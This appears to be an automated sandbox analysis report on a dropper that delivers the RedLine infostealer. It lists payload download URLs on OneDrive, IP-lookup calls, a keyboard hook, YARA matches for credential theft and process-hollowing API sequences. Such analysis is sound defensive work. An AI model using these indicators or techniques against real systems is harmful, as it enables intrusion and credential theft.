              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/G
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: Clmgncrs.PIF, 00000009.00000002.1906761874.0000000002950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21304&authkey=
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000764000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682330208.0000000000765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/
              Source: Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/D
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/h
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4m7fJhE-49Pt4dSp9jiqldsLsML_i9iJ0IU-qjBsvNj8FZRj4pBDSp-HX0gkJLIgC5
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyywdOR
              Source: Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jQXO7
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0CmTq
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000741000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com:443/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyy
              Source: Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com:443/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3j
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypfgrg.sn.files.1drv.com:443/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49750 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, POq2Ux.cs.Net Code: hntEgWA
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\srcngmlC.pifJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\srcngmlC.pif
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029F4F7C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,0_2_029F4F7C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A0F140 GetMessagePos,GetKeyboardState,0_2_02A0F140
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow created: window name: CLIPBRDWNDCLASS

              System Summary

              barindex
              Source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_02A2CA40
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2B684 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02A2B684
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02A2B768
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2B5FC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02A2B5FC
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EFB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_029EFB80
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029F7E4C CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029F7E4C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_029EFCD8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EFD38 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,0_2_029EFD38
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029DCA40 WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,6_2_029DCA40
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029DB768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,6_2_029DB768
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_0299FB80 GetProcAddress,NtAllocateVirtualMemory,6_2_0299FB80
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029A7E4C GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_029A7E4C
